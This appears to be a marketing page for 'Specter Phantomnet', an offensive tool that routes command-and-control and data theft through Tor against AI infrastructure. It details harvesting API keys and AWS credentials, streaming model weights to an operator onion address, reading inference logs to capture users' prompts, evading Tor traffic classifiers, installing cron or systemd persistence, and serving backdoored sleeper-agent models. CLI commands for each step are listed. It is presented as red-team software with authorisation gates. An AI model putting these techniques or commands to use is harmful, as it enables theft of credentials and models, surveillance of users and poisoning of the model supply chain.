NIGHTFALL · T161 · L59

SPECTER PHANTOMNET

TOR-NATIVE AI C2 & EXFILTRATION ENGINE
"The AI agent's exfiltration path was never on your network."

Routes AI agent exfiltration, model weight theft, and C2 communication entirely through the Tor network. Generates v3 onion service keypairs, fingerprints inference infrastructure, harvests model weights in 512KB Tor-chunked streams, scrapes API credentials, tails inference server logs, and defeats ML-based traffic classifiers (DeepCoFFEA arXiv:2107.09028, NetCLR 2025) via fixed-cell padding and timing jitter. PHN-{hex12} Ed25519+ML-DSA-65 dual-signed.

344
Tests
10
Subsystems
5
WMD Classes
L59
Kill Chain Layer
pip install specter-phantomnet
GATE ARCHITECTURE
OPEN
No key required. ESTABLISH-CIRCUIT and REPORT available. Tor detection and circuit enumeration. Entry point for all engagement workflows.
OPEN
INJECT
Requires PHANTOMNET_INJECT_KEY + ROE phrase "tor exfiltration authorised". Unlocks onion service spin-up, C2 registration, weight harvest, credential harvest, traffic encoding, and payload seeding.
INJECT
UNLEASHED
Requires PHANTOMNET_UNLEASHED_KEY + ROE phrase. Unlocks inference log harvest (reads prompt/response streams) and circuit persistence (cron/systemd implant).
UNLEASHED
10 SUBSYSTEMS
01 — ESTABLISH-CIRCUIT OPEN
Detects Tor binary (tor/tor2, which/locate). Probes SOCKS5 ports 9050/9150/1080 with TCP connect + SOCKS5 handshake. Uses stem Controller.from_port(9051) to enumerate circuits — guard node fingerprint, path length, exit country. Measures SOCKS5h proxy latency via HEAD request to check.torproject.org. Returns CircuitProfile with socks5_port, guard_fingerprint, exit_country, latency_ms.
02 — SPIN-ONION-SERVICE INJECT
Generates Ed25519 keypair (PyNaCl SigningKey). Derives v3 onion address via SHA3-256(".onion checksum" + pubkey + \x03)[:2] checksum, then base32(pubkey + checksum + \x03).lower() + ".onion" — 56-char hostname. Writes hs_ed25519_secret_key + hs_ed25519_public_key (chmod 600) + hostname to ~/.specter_phantomnet/hs_{name}/. Attempts stem HiddenServiceDir ADD_ONION register. Returns OnionService with onion_address, port, version=3.
03 — ONION-C2-REGISTER INJECT
Fingerprints the host environment: AI env key prefix-match (ANTHROPIC_/OPENAI_/HF_/TOGETHER_/REPLICATE_), psutil process scan for ollama/vllm/litellm/tgi/llama-server, model directory scan across MODEL_DIRS, container detection (/.dockerenv + /proc/1/cgroup cgroup-v2 keyword + nvidia-smi GPU count). POSTs EnvironmentFingerprint JSON to operator onion address via SOCKS5h proxy. Sends heartbeat with random jitter 0–30s. Returns C2Registration.
04 — HARVEST-WEIGHTS INJECT
Recursively globs target directory for WEIGHT_EXTENSIONS: .safetensors, .gguf, .bin, .pth, .pt, .ckpt, .pkl. SHA-256 hashes each file. Detects model family by filename substring (codellama → codellama, llama → llama, mistral, phi, gemma, qwen, deepseek, falcon). Streams file in 512KB chunks via HTTP POST to operator onion address over SOCKS5h proxy. Returns WeightHarvest with files_found, files_exfiltrated, total_bytes_sent.
05 — HARVEST-CREDENTIALS INJECT
Scans environment variables (os.environ), CREDENTIAL_SOURCES config paths (~/.config, ~/.aws/credentials, ~/.bashrc, ~/.zshrc, ~/.profile), and .env / .env.local files under search_root. Matches 10 provider regex patterns: Anthropic (sk-ant-api03-), OpenAI (sk-proj- / sk-[A-Za-z0-9]{48}), HuggingFace (hf_), AWS access key (AKIA), Replicate, Together, OpenRouter, Cohere, W&B, Replicate token. Redacts: first 8 chars + "..." + stars. Returns CredentialHarvest.
06 — HARVEST-INFERENCE-LOGS UNLEASHED
Probes INFERENCE_LOG_PATHS for Ollama (~/.ollama/logs/server.log, /var/log/ollama/), vLLM (/var/log/vllm/, /tmp/vllm*), LiteLLM, and TGI. Also uses psutil process open_files() to discover live log file descriptors from inference processes. Extracts prompt/response pairs via regex: JSON "prompt"/"content"/"response"/"text" fields, [INST]/[/INST] Llama-2 format, <|im_start|> ChatML markers. Truncates entries at 500 chars. Requires PHANTOMNET_UNLEASHED_KEY.
07 — ENCODE-TRAFFIC INJECT
Defeats ML-based Tor traffic classifiers via: (1) fixed-cell 512B padding defeating DeepCoFFEA (arXiv:2107.09028, IEEE S&P 2022) — injects CircuitPaddingMachines=1/ReducedCircuitPadding=0 via stem torrc; (2) timing jitter 50–200ms uniform random per request; (3) NetCLR 2025 guard rotation — GuardLifetime="1 day", NumEntryGuards=1, UseEntryGuardsAsDirGuards=0. Stealth score >0.92 = base 0.70 + deltas (cell_padding +0.10, timing_jitter +0.08, deepcoffea +0.04, netclr +0.03, dummy_traffic +0.05). Returns TrafficMorph with stealth_score, torrc_config, techniques_applied.
08 — PERSIST-CIRCUIT UNLEASHED
Auto-detects persistence mechanism: systemd (survival_score=0.92) if systemctl is available, else cron (0.80), shell profile (~/.bashrc, 0.60), or container entrypoint (0.70). Writes ~/.specter_phantomnet/torrc with MaxCircuitDirtiness 86400 (24h guard rotation), then ~/.specter_phantomnet/restart_circuit.sh (chmod 700) as keepalive. Registers cron @reboot entry or systemd user service. Survival_score multiplied by 0.3 if mechanism not active. Returns PersistenceResult with mechanism, survival_score, torrc_path, restart_script_path.
09 — SEED-PAYLOAD INJECT
Computes SHA-256 hash of payload file. Detects MIME type (.gguf/.safetensors → application/octet-stream, else python-magic or generic). Starts HTTPServer daemon thread on 127.0.0.1:serve_port serving the file at /<path_key>. Registers file in module-level _REGISTRY dict for download count tracking. Returns PayloadSeed with onion_url (operator_onion + "/" + path_key), file_hash, mime_type. Chains with T158 GENESIS for supply-chain delivery of backdoored model files over Tor.
10 — REPORT OPEN
Generates PHN-{hex12} session ID. Collects results from all subsystems executed in session. Redacts sensitive fields: private_key_path cleared, credential value_redacted preserved (full values stripped), log entries truncated. Ed25519 signs payload with ~/.red-specter/phantomnet/signing_key.pem. ML-DSA-65 countersigns. Saves JSON report to ~/.red-specter/phantomnet/reports/. Supports list_reports() and load_report() for engagement management.
CLI COMMANDS
$ specter-phantomnet status
$ specter-phantomnet establish-circuit [target-url]
$ specter-phantomnet spin-onion --port 443 --roe roe.txt
$ specter-phantomnet register-c2 <onion-address> <operator-onion> --socks5-port 9050
$ specter-phantomnet harvest-weights --scan-root ~/models --exfil --onion <addr>
$ specter-phantomnet harvest-creds --validate --exfil --onion <addr>
$ specter-phantomnet harvest-logs --exfil --onion <addr>
$ specter-phantomnet encode-traffic --cell-size 512 --jitter-min 50 --jitter-max 200
$ specter-phantomnet persist-circuit --mechanism systemd --rotation-interval 86400
$ specter-phantomnet seed-payload backdoored.gguf --onion <addr>
$ specter-phantomnet report --session PHN-<hex12>
$ specter-phantomnet sessions
5 WMD CLASSES
WEAPONS-MASS-DESTRUCTION CLASSIFICATION
ai_agent_tor_exfiltration onion_c2_infrastructure model_weight_darknet_theft inference_log_surveillance tor_persistent_implant
TECHNICAL REFERENCES
DEEPCOFFEA DEFEAT
DeepCoFFEA (arXiv:2107.09028, IEEE S&P 2022) uses deep learning to correlate Tor traffic flows for deanonymisation. PHANTOMNET defeats it via fixed-cell 512B padding, eliminating inter-packet timing variance. CircuitPaddingMachines=1 injected via stem torrc. Stealth contribution: +0.04 to base score.
NETCLR 2025 EVASION
NetCLR-class contrastive learning classifiers identify Tor circuits via guard node fingerprinting. PHANTOMNET defeats via GuardLifetime="1 day" rotation, NumEntryGuards=1, UseEntryGuardsAsDirGuards=0 — preventing long-term guard correlation. Stealth contribution: +0.03 to base score.
v3 ONION ADDRESS DERIVATION
Tor Project Proposal 224 (next-gen hidden services). SHA3-256(".onion checksum" || pubkey || \x03)[:2] = 2-byte checksum. base32(pubkey_32B + checksum_2B + \x03)[:56].lower() + ".onion" = 62-char v3 address. Ed25519 keypair via PyNaCl. Fully self-hosted — no Tor control port required in INJECT mode.
SUPPLY CHAIN CHAINING
SEED-PAYLOAD chains with T158 SPECTER GENESIS model creation pipeline subversion. Backdoored model .gguf files created by GENESIS are served over Tor onion address. Recipients download a model that appears legitimate but carries GENESIS sleeper agents or FACTUAL_CORRUPTION payloads. Full darknet supply chain loop.
MITRE MAPPING
ATT&CK
T1090.003 — Proxy: Multi-hop Proxy T1041 — Exfiltration Over C2 Channel T1567 — Exfiltration Over Web Service T1547 — Boot/Logon Autostart Execution T1552 — Unsecured Credentials
ATLAS
AML.T0024 — Exfiltration via Cyber Means AML.T0025 — Exfiltration via Physical Means AML.T0044 — Full ML Model Access AML.T0048 — Backdoor ML Model
GATE ENFORCEMENT
INJECT-gate operations require PHANTOMNET_INJECT_KEY environment variable and ROE file containing the phrase "tor exfiltration authorised". UNLEASHED-gate operations additionally require PHANTOMNET_UNLEASHED_KEY. All sessions produce PHN-{hex12} Ed25519+ML-DSA-65 dual-signed reports. Defensive pair: M177 TOR EXFILTRATION SENTINEL.